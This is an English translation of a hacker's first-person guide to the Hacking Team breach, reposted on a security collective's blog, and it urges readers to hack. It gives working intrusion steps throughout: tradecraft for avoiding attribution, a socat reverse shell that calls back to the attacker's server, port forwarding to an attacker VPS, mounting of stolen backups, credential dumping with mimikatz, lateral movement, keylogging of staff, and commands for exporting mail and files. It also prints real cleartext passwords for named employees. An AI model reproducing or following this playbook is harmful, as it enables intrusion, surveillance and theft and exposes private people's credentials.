Shadow Systems
Shadow Systems

We're an Information Security Collective. Welcome to the madness. Follow us on Twitter, SoundCloud, and LobsterTell. LobsterTell isn't a real thing, but it's believable, isn't it? That's really sad.

Share


Twitter


Phineas Fisher's HackBack II (English Translation)

WhiskeyNeonWhiskeyNeon
                _   _            _      ____             _    _ 
               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
               |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

                                 A DIY Guide



                                 ,-._,-._             
                              _,-\  o O_/;            
                             / ,  `     `|            
                             | \-.,___,  /   `        
                              \ `-.__/  /    ,.\      
                             / `-.__.-\`   ./   \'
                            / /|    ___\ ,/      `\
                           ( ( |.-"`   '/\         \  `
                            \ \/      ,,  |          \ _
                             \|     o/o   /           \.
                              \        , /             /
                              ( __`;-;'__`)            \\
                              `//'`   `||`              `\
                             _//       ||           __   _   _ _____   __
                     .-"-._,(__)     .(__).-""-.      | | | | |_   _| |
                    /          \    /           \     | | |_| | | |   |
                    \          /    \           /     | |  _  | | |   |
                     `'-------`      `--------'`    __| |_| |_| |_|   |__
                               #antisec

1. Introduction

Note the change in language since the last issue [1]. The English-speaking worlds already has books, talks, guides, and all sorts of information about hacking. There are a lot of hackers in that world who are better than I am, but disgracefully fritter away their knowledge working as "defence" contractors, for intelligence agencies, protecting banks and corporations and defending the established order. Hacker culture in the EU originated as a counterculture, but all that's left of that origin is the aesthetic -- everything else has been assimilated. At least they get to wear a T-shirt, dye their hair blue, use hacker handles, and feel like rebels while they work for the system.

There was once a time when you had to break into an office building to exfiltrate documents [2]. You used to need a gun to rob a bank. These days you can do it all from bed with a laptop in your hands [3][4]. Like the CNT once said about the Gamma Group hack: "we should move forward with these new forms of struggle" [5]. Hacking is a powerful tool. Learn it and join the fight!

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html [4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group

2. Hacking Team

Hacking Team was a company that helped governments to hack and spy on journalists, activists, the political opposition, and other threads to their power [1][2][3][4][5][6][7][8][9][10][11] -- as well as, every now and then, criminals and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the fascist slogan "boia chi molla". He was, more precisely, a "boia chi vende RCS". All the while, he claimed to have the technology to solve the "Tor problem" and the "darknet problem" [13]. But since I've been able to maintain my freedom, I have my doubts about how effective that technology is.

[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
[12] http://www.ilmessaggero.it/primopiano/cronac/yara_bossetti_hacking_team-1588888.html
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web

3. Be careful out there

Sadly, our world is upside-down. You get richer by doing bad things, and get locked up for doing good things. Fortunately, thanks to the hard work of people like those in the "Tor Project" [1], you can avoid getting yourself locked up by following a few simple guidelines:

1. Encrypt your hard drive [2]

I assume that by the time the police come to impound your computer, you've already made many mistakes, but an ounce of prevention is worth a pound of cure.

2. Use a virtual machine and route all your traffic through Tor

This achieves two things. First, all of your connections are anonymized through the Tor network. Second, keeping your personal life and your anonymous life on different computers helps you avoid mixing them up by accident.

You can protect yourself with Whonix [3], Tails [4], Qubes TorVM [5], or something personalized [6]. You can find a detailed comparison here [7].

3. (Optional) Don't connect to the Tor network directly

Tor is not a panacea. It's possible to correlate the times at which your connected to Tor with the times during which your hacker handle is active. There have also been attacks using the Tor exit node [8]. You can connect to the network using other people's wifi. Wifislax [9] is a linux distro with many tools for procuring wifi. Another option is to connect to a VPN or a bridge node [10] before connecting to Tor, but this is less secure because it is possible to correlate the hacker's activity with the internet activity coming from your house (this was used as evidence against Jeremy Hammond, for example [11]).

The reality is that while Tor is not perfect, it works well enough. When I was young and reckless, I did a lot of things without any protection (I'm talking about hacking, here) apart from Tor, and which the police were still incapable of investigating, and I never had any problems.

[1] https://www.torproject.org/
[2] https://info.securityinabox.org/es/chapter-4
[3] https://www.whonix.org/
[4] https://tails.boum.org/
[5] https://www.qubes-os.org/doc/privacy/torvm/
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
[7] https://www.whonix.org/wiki/Comparison_with_Others
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
[9] http://www.wifislax.com/
[10] https://www.torproject.org/docs/bridges.html.en
[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html

3.1 Infrastructure

I don't hack directly from the Tor exit nodes. They're on blacklists, go very slowly, and cannot receive reverse connections. Tor serves to
protect my anonymity while I connect to the infrastructure I use for hacking, which consists of:

1. Domain names

to give directions to command and control (C&C), and for setting up DNS tunnels for secure exfiltration.

2. Stable server

to serve as C&C servers for receiving reverse shells, as a place to launch attacks from, and a place to stash the loot.

3. Hacked servers

these serve as pivots behind which I hide the IP addresses of stables servers, and for when I want a quick connection without a pivot -- for portscanning, for example, or scanning the entire internet, or downloading a database through sql injection, etc.

Obviously you have pay anonymously, with bitcoin, for exaple (if you use it carefully).

3.2 Accountability

In the news we often see attacks attributed to groups of governmental hackers ('APTs'), because they always use the same tools, leave the same footprints, and even use the same infrastructure (domains, emails, etc.). They're negligent because they free to hack without any legal consequences.

I didn't want to make it too easy for the police to link what I did to Hacking Team, with its hacks and handles, with my day-to-day work as a blackhat hacker. So I used new servers and domains, registered with new email accounts, and payed with new bitcoin. And I only used tools which were either publically available, or which I had written specifically for this attack, and I changed my style of doing things so as to not leave my usual forensic footprint.

4. Gathering information

Though it might be tedious, this step is very important, since the larger the attack surface, the easier it will be to find a weakness in it, somewhere.

4.1 - Technical Information

Some of the tools and techniques include:

1) Google

You can find a lot of unexpected things with a couple well-chosen search queries. The identity of DPR, for example [1]. The bible on how to use google for hacking is the book, "Google Hacking for Penetration Testers" [2].

2) Enumeration of subdomains

A business's main domain is usually supplied by a third party, and you're going to find a range of IP addresses belonging to subdomains like mx.company.com, ns1.company.com, etc. And sometimes there are things in 'hidden' subdomains that should not be exposed. Tools useful for discovering domains are subdomains include fierce [3], theHarvester [4], and recon-ng [5].

3) Whois queries and inverse queries

With an inverse query using a domain's whois information or a business's IP range, you can find other domains and IP ranges belonging to them. As far as I know, there's no free way of making inverse whois queries, except for a google 'hack': "via della moscova 13" site:www.findip-address.com "via della moscova 13" site:domaintools.com

4) Portscanning and fingerprinting

Apart from the other techniques, you can talk to the business's employees. I include it in this section because it isn't an attack, just a means of obtaining information. The business's IDS might generate an alert upon detecting a portscan, but you don't have to worry about that. The entire internet is scanning itself constantly.

For scanning, nmap [6] is precise, and can fingerprint most of the services it discovers. For businesses with large IP ranges, zmap [7] or masscan [8] are fast. WhatWeb [9] and BlindElephant [10] can fingerprint websites.

[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
[3] http://ha.ckers.org/fierce/
[4] https://github.com/laramies/theHarvester
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
[6] https://nmap.org/
[7] https://zmap.io/
[8] https://github.com/robertdavidgraham/masscan
[9] http://www.morningstarsecurity.com/research/whatweb
[10] http://blindelephant.sourceforge.net/

4.2 - Social information

For social engineering, it's very useful to gather information about the employees, their roles, contract information, operating system, nagivator, plugins, software, etc. Some resources include:

1) Google

Here's the most useful tool, again.

2) theHarvester y recon-ng

I've mentioned these already in the last section, but they have much more functionality. You can find a lot of information quickly and automatically. It's worth the trouble to read all the documentation.

3) LinkedIn

You can find a lot of information about the employees here. The businesses' recruiters will be the ones most inclined to talk.

4) Data.com

Previously known as jigsaw. They have contact information for many employees.

5) File metadata

You can find a lot of information about employees and their system in the metadata of files that the business has published. Some handy tools for finding files on a business's website and extracting metadata are metagoofil [1] and FOCA [2].

[1] https://github.com/laramies/metagoofil
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html

5 - Entering the Network

There are various ways to make an entrance. Since the method used for Hacking Team is less common and more trouble than is ordinarily necessary, I'm going to talk a bit about more common methods, which I recommend attempting first.

5.1 - Social engineering

Social engineering, and specifically spear phishing, is responsible for the majority of hacks these days. For an introduction in Spanish, see [1]. For more information in English, see [2] (the third part, "Targeted Attacks"). For entertaining anecdotes about social engineering in the past, see [3]. I didn't want to try spear phishing against Hacking Team, since their business is in helping governments spear phish their opposition. There was therefore a much greater risk of Hacking Team recognizing and investigating said attempts.

[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf

5.2 - Buying access

Thanks to the hardworking Russians and their exploit kits, traffic trafickers, and bot farms, many businesses already have compromised machines in their network. Almost all of the Fortune 500, with their enormous networks, have a few bots on the inside. That said, Hacking Team is a very small business, most of whose employees are experts in information security, and so there was very little probability that they had already been compromised.

5.3 - Technical exploitation

After the Gamma Group hack, I discovered a process for searching for vulnerabilities [1]. Hacking Team has the public IP range:

inetnum: 93.62.139.32 - 93.62.139.47
descr: HT public subnet

Hacking Team had a small exposure to the internet. For example, unlike the Gamma Group, their public-facing site required the client to have a certificate in order to connect. It contained a main website (a Joomla blog, for which Joomscan [2] revealed no serious vulnerabilities), a mail server, a couple of routers, two VPN systems, and a spam-filtering system. And so I had three options: to try to find a 0day in Joomla, a 0day in postfix, or a 0day in one of the embedded systems. A 0day in an embedded system seemed to me to be the most tenable option, and after about two weeks of reverse engineering, I discovered a remote root exploit. Since the vulnerabilities it relies on haven't yet been patched, I'm not going to give any more details on it. For more information on how to search for this type of vulnerability, see [3] and [4].

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] http://sourceforge.net/projects/joomscan/
[3] http://www.devttys0.com/
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A

6 - Be prepared

I did a lot of work and testing before using the exploit against Hacking Team. I wrote a firmware with a backdoor, and compiled various post-exploitation tools for the embedded system. The backdoor served to protect the exploit. Using the exploit just once and then returning thorugh the back door made the work of discovering and patching vulnerabilities more difficult.

The post-exploitation tools I had prepared were:

1) busybox

for all the common Unix utilities that the system didn't have.

2) nmap

for scanning and fingerprinting Hacking Team's internal network.

3) Responder.py

the most useful tool for attacking Windows when you have access to the internal network but don't have a user account.

4) Python

for executing Responder.py.

5) tcpdump

for sniffing traffic.

6) dsniff

for snooping passwords from vulnerable protocols like ftp, and for arpspoofing. I'd rather have used ettercap, writen by Hacking Team's own ALoR and NaGA, but it was difficult to compile for the system.

7) socat

for a handy pty shell:

my&#95;server: socat file: `tty`, raw, echo=0, tcp-listen:mi&#95;port

hacked&#95;system: socat exec:'bash -li',pty,stderr,setsid,sigint,\
               sane tcp:my&#95;server:my&#95;port

And for many other things. It's a network swiss army knife. See the examples section of its documentation.

8) screen

like socat's pty, not strictly necessary, but I wanted to feel at home in Hacking Team's network.

9) a SOCKS proxy server

to use together with proxychains for accessing the internal network with this or that other programme.

10) tgcd

for forwarding ports, like those of the SOCKS server, through the firewall.

[1] https://www.busybox.net/
[2] https://nmap.org/
[3] https://github.com/SpiderLabs/Responder
[4] https://github.com/bendmorris/static-python
[5] http://www.tcpdump.org/
[6] http://www.monkey.org/~dugsong/dsniff/
[7] http://www.dest-unreach.org/socat/
[8] https://www.gnu.org/software/screen/
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
[10] http://tgcd.sourceforge.net/

The worst thing that could happen would be that my backdoor or post-exploit tools would make the system unstable, and force an employee to investigate. So I spent a week testing my exploit, backdoor, and post-exploit tools in the networks of other vulnerable businesses before entering Hacking Team network.

7 - Watch and listen

Now that I was inside the internal network, I wanted to take a look around and think about my next step. Switching Responder.py to analysis mode (-A, to listen without sending poisoned responses), and performed a slow scan with nmap.

8 - NoSQL databases

NoSQL, or rather NoAuthentication, has been a great gift to the hacker community [1]. Just when I was worrying that all MySQL's sins of omission had finally been patched [2][3][4][5], these new databases appear, lacking authentication by design. Nmap found a few in Hacking Team's internal network:

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
...
|_    version = 2.6.5

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 31987
|   totalSize = 33540800512
|   databases
...
|_    version = 2.6.5

These were databases for RCS test instances. The audio that RCS captures is held in a MongoDB with GridFS. This is where the audio folder in the torrent [6] came from. They had inadvertantly spied on themselves.

[1] https://www.shodan.io/search?query=product%3Amongodb
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
[6] https://ht.transparencytoolkit.org/audio/

9 - Crossed wires

As fun as it was to listen to captures and watch webcam images of Hacking Team developing its malware, it wasn't very useful. Their insecure security backups were the vulnerability that threw the doors open. According to the documentation [1], their iSCSI systems should have been on a separate network, but nmap count a few of them in their 192.168.1.200/24 subnet:

...
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:ht-synology.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)

...
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:synology-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required

iSCSI requires a kernel module, and it would have been difficult to compile it for the embedded system. I forwarded the port so that I could mount it from a VPS:

VPS: tgcd -L -p 3260 -q 42838
Sistema embebida: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

iSCSI now finds the name iqn.2000-01.com.synology, but has some problems mounting it since it now believes that its address is both 192.168.200.72 and 127.0.0.1.

The to solve this is:

iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

and then:

iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

...and the archive system appears! We mount it:

vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

and find secure backups of various virtual machines. The Exchange server seems like the most interesting. It's too big to download, but we can mount it remotely and search for interesting archives:

$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1            2048  1258287103   629142528    7  HPFS/NTFS/exFAT

entonces el offset es 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

and now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14172311 we find the hard drive of the virtual machine, and mount it:

vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

...and, finally, we have gotten to the centre of the matryoshka doll and we can see all of the archives of the old Exchange server on /mnt/part1.

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf

10 - From secure backups to domain admin

What interested me most in the secure backup was trying to find a password or hash that I could use to access the actual server. I used pwdump, cachedump, and lsadump [1] with the registry backups. lsdadump found a password for the besadmin service account:

_SC_BlackBerry MDS Connection Service
0000   16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0010   62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00    b.e.s.3.2.6.7.8.
0020   21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00    !.!.!...........

I used proxychains [2] with the socks server in the embedded system and smbclient [3] to check the password:

proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

It worked! The besadmin password was still valid, and was a local admin. I used my proxy and metasploit's psexec_psh [4] to gain a meterpreter session. I migrated to a 64-bit process, "load kiwi [5], and "creds_wdigest", and by now had a number of passwords, including the domain admin's:

 HACKINGTEAM  BESAdmin       bes32678!!!
 HACKINGTEAM  Administrator  uu8dd8ndd12!
 HACKINGTEAM  c.pozzi        P4ssword      <---- look! the sysadmin!
 HACKINGTEAM  m.romeo        ioLK/(90
 HACKINGTEAM  l.guerra       4luc@=.=
 HACKINGTEAM  d.martinez     W4tudul3sp
 HACKINGTEAM  g.russo        GCBr0s0705!
 HACKINGTEAM  a.scarafile    Cd4432996111
 HACKINGTEAM  r.viscardi     Ht2015!
 HACKINGTEAM  a.mino         A!e$$andra
 HACKINGTEAM  m.bettini      Ettore&Bella0314
 HACKINGTEAM  m.luppi        Blackou7
 HACKINGTEAM  s.gallucci     1S9i8m4o!
 HACKINGTEAM  d.milan        set!dob66
 HACKINGTEAM  w.furlan       Blu3.B3rry!
 HACKINGTEAM  d.romualdi     Rd13136f@#
 HACKINGTEAM  l.invernizzi   L0r3nz0123!
 HACKINGTEAM  e.ciceri       2O2571&2E
 HACKINGTEAM  e.rabe         erab@4HT!

[1] https://github.com/Neohapsis/creddump7
[2] http://proxychains.sourceforge.net/
[3] https://www.samba.org/
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
[5] https://github.com/gentilkiwi/mimikatz

11 - Downloading the mail

Now that I had the password to the domain's admin, I had access to the email, the hard of the business. Since every password I used raised the risk of being detected, I download the emails before going on to explore them. Powershell makes this easy [1]. Curiously, I found a bug in the way that dates were handled. After obtaining the emails, I waited a couple of weeks before getting the source code and all the rest, returning once in a while to download new emails. The server was Italian, with dates in the format day/month/year. I used:

-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

with New-MailboxExportRequest to download the new mails (in this case all the mails from June 5th onward). The problem was that it said that the date is invalid if the day is greater than 12 (imagine that this is because the month is usually put first in the EU, and the month can't be greater than 12). It seems that the engineers at Microsoft had only tested their software on their own regional configuration.

[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/

12 - Downloading archives

Now that I was the domain's admin, I started downloading the shared resources using my proxy and smbclient's -Tc option. For example:

proxychains smbclient '//192.168.1.230/FAE DiskStation' \
    -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'

This is where the Amministrazione, FAE DiskStation, and FileServer folders in the torrent came from.

13 - Introduction to hacking a Windows domain

I'd like to take a break from the story of these fuckers [weones culiaos], to share a bit of knowledge about attacking Windows networks.

13.1 - Lateral movement

I'm going to give a quick review of the techniques used for spreading out inside a Windows network. The techniques for remote execution require a local administrator's password or hash to work. Often, the most common way of obtaining these credentials is to use mimikatz [1], and above all sekurlsa::logonpasswords and sekurlsa::msv, from the machines you already have administrative access to. The techniques for moving around "in situ" also require administrative privileges (except for runas). The most important tools for privilege escalation are PowerUp [2], and bypassuac [3].

[1] https://adsecurity.org/?page_id=1821
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1

Remote navigation:

1) psexec

The tried and tested way of navigating Windows networks. You can use psexec [1], winexe [2], metasploit's psexec_psh [3], powershell empire's invoke_psexec [4], or the Windows command "sc" [5]. For the metasploit module, powershell empire, and pth-winexe [6], it's enough to know the hash without knowing the password. This is the most universal way (it works on any computer with port 445 open), but it is also the least cautious. Events of type 7045 "Service Control Manager" will appear in the registry. In my experience, this has never tipped anyone off during a hack, but it's something they might notice afterwards, and it might help the investigators figure out what the hacker was doing.

2) WMI

The most cautious method. The WMI service is enabled on all Windows computers, except for servers, where the firewall blocks it by default. You can use wmiexec.py [7], pth-wmis [6] (you can find a demo of wmiexec and pth-wmis here [8]), powershell empires's invoke_wmi, or the Windows command, wmic [5]. Aside from wmic, the rest of these require only the hash.

3) PSRemoting [10]

This is disabled by default, and I don't advise enabling new protocols unless you have you. But if the sysadmin has already enabled it, it's very convenient, especially if you use powershell for everything (and yes, you should use powershell for almost everything; this may change [11] with powershell 5 and Windows 10, but right now powershell makes it easy to do everything in RAM, dodge the antivirus, and leave few footprints).

4) Programmed tasks

You can execute programmes remotely with at and schtasks [5]. They work in the same situations as psexec, and likewise leave some 1known footprints [12].

5) GPO

If all of those protocols are disabled or blocked by the firewall, once you are the administrator of the domain, you can use GPO to give it a logon script, install an msi, execute a programmed task [13], or as we will see with computer of Mauro Romeo (Hacking Team's sysadmin), enable WMI and open the firewall through GPO.

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
[2] https://sourceforge.net/projects/winexe/
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
[4] http://www.powershellempire.com/?page_id=523
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency- cc/

[6] https://github.com/byt3bl33d3r/pth-toolkit
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/
[9] http://www.powershellempire.com/?page_id=124
[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
[11] https://adsecurity.org/?p=2277
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py

Navigation 'in situ':

1) Impersonating tokens

Once you have administrative access to a computer, you can use other users' tokens to access the domain's resources. Two tools for doing this are incognito [1] and the token::* commands in mimikatz [2].

2) MS14-068

You can take advantage of a validation vulnerability in Kerberos to generate a domain administrator ticket [3][4][5].

3) Pass the Hash

If you have your has but the user does not have an active session, you can use sekurlsa:pth [2] to obtain a user ticket.

4) Process injection

Any RAT can be injected into another process -- the migrate command in meterpreter and pupy [6], for example, or psinject [7] in powershell empire. You can inject the process that has the token that you want.

5) runas

This sometimes turns out to be very useful because it doesn't require admin privileges. The command is part of Windows, but if you dont' have the graphical interface, you can use powershell [8].

[1] https://www.indetectables.net/viewtopic.php?p=211165
[2] https://adsecurity.org/?page_id=1821
[3] https://github.com/bidord/pykek
[4] https://adsecurity.org/?p=676
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
[6] https://github.com/n1nj4sec/pupy
[7] http://www.powershellempire.com/?page_id=273
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1

13.2 - Persistence

Once you have gained access, you want to maintain it. Persistence is really only a challenge for sons of bitches [hijos de puta] like the ones in Hacking Team, who want to hack activists or other individuals. When you're hacking businesses, you don't need persistence because the business never sleeps. The only 'persistence' I use is in duqu 2's sense, executing in the RAM of a couple of servers with high rates of uptime. In the hypothetical case that everything is reset at once, I have passwords and a golden ticket [1] set aside. You can read more information about persistence mechanisms for Windows here [2][3][4]. But for hacking businesses, you don't need it, and it raises the risk of detection.

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
[3] http://www.hexacorn.com/blog/category/autostart-persistence/
[4] https://blog.netspi.com/tag/persistence/

13.3 - Internal reconnaissance

The best tool these days for understanding Windows networks is Powerview [1]. It's worth the trouble to read everything by the author [2], and above all [3], [4], [5], and [6]. Powershell is, again, very powerful [7]. But since there are still many 2003 and 2000 servers without powershell, you should also look the old school way [8], with tools like netview.exe [9] or the windows "new view" command. Other techniques that I like are:

1) Download a list archive numbers

With the domain administrator account, you can download all the archive numbers in the network with powerview:

   Inqvoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
   select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1]
   | select fullname | out-file -append files.txt}

You can then read it at your leisure later on, and choose the ones that you want to download.

2) Read emails

As we have already seen, you can download emails with powershell, and obtain a lot of useful information.

3) Read sharepoint

This is another place where many businesses have important information. You can download it with powershell [10].

4) Active Directory [11]

It holds a lot of useful information about users and computers. Without being the domain admin, you can already find a great deal of information with powerview and other tools [12]. After becoming the domain admin, you should export all the information from AD using csvde or some other tools.

5) Spy on the employees

One of my favourite passtimes is stalk the sysadmins. By spying on Christian Pozzi (Hacking Team's sysadmin), I gained access to the Nagios server, which gave me access to the 'rete sviluppo' (the development network with the RCS source code). With a simple combination of PowerSploit's Get-Keystrokes and Get-TimedScreenshot [13], nishang's Do-Exfiltration, and GPO, I could spy on any employee I wanted, or even the entire domain.

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
[2] http://www.harmj0y.net/blog/tag/powerview/
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview
[7] https://adsecurity.org/?p=2535
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E
[9] https://github.com/mubix/netview
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
[11] https://adsecurity.org/?page_id=41
[12] http://www.darkoperator.com/?tag=Active+Directory
[13] https://github.com/PowerShellMafia/PowerSploit
[14] https://github.com/samratashok/nishang

14 - Stalking sysadmins

Reading the infrastructure's documentation [1], I learned that I still lacked access to something important -- the 'Rete Sviluppo', an isolated network that held the source code of RCS. The sysadmins of a business always have access to everything. I searched through Mauro Romeo and Christian Pozzi's computers to see how they accessed the rete sviluppo, and to see if they had other interesting systems that I should investigate. It was easy to access their computers, since they were part of the Windows domain that I had adminstrative control over. Muro Romeo's computer didn't have an open port, so I opened the WMI port [2] so that I could execute meterpreter [3]. Besides collecting keystrokes and screencaps with Get-Keystrokes and Get-TimedScreenshot, I used a lot of metasploit's /gather/ modules, CredMan.ps1 [4], and I searched the archives [5]. I saw that Pozzi had a Truecrypt volume, and waited for him to mount it so that I could copy an archive of it. A lot of people have had a good laugh at Christian Pozzi's weak passwords (and at Christian Pozzi in general, who offered plenty of material for comedy [6][7][8][9]). I included them in the dump for a laugh, and to show how clueless he is. The reality is that mimikatz and keyloggers got all the passwords as well.

[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
[2] http://www.hammer-software.com/wmigphowto.shtml
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
[5] http://pwnwiki.io/#!presence/windows/find_files.md
[6] http://archive.is/TbaPy
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/

15 - The bridge

Inside Christian Pozzi's encrypted volume, there was a textfile with a number of passwords [1]. One of those was for a Fully Automated Nagios server, which had access to the sviluppo network so that it could monitor it. I had found the bridge. I only had the password for the web interface, but I had a public exploit [2] to execute code and obtain a shell (it's an unauthenticated exploit, but needs a user to have already initiated a session, using one of the passwords in the textfile).

[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
[2] http://seclists.org/fulldisclosure/2014/Oct/78

16 - Reusing and resetting passwords

Reading the emails, I saw Daniele Milan granting access to the git repositories. I already had his Windows password, thanks to mimikatz. I tried it on the git server, and it worked. I tried it with sudo, and it worked. For the gitlab server, and his twitter account, I used the 'I forgot my password' function, and accessed the mail server to reset the password.

17 - Conclusion

That's it. It's that easy to overthrow an enterprise and put a stop its human rights abuses. That is the beauty and the asymmetry of hacking: with just one hundred hours of work, one person can undo years of work by a multi-million-dollar enterprise. Hacking gives us the dispossessed the ability to fight and win.

Hacking guides usually end with a warning: This information is solely for educational purposes. Be an ethical hacker. Do not attack computers without permission. Blah, blah, blah. I'm going to say the same thing, but with a more rebellious conception of 'ethical' hacking. Ethical hacking means exfiltrating documents, expropriating money from the banks, and protecting the computers of the common people. However, most of the people who call themselves 'ethical hackers' work only to protect the ones that pay their consulting fees, and so they usually end up being mercenaries more than hackers.

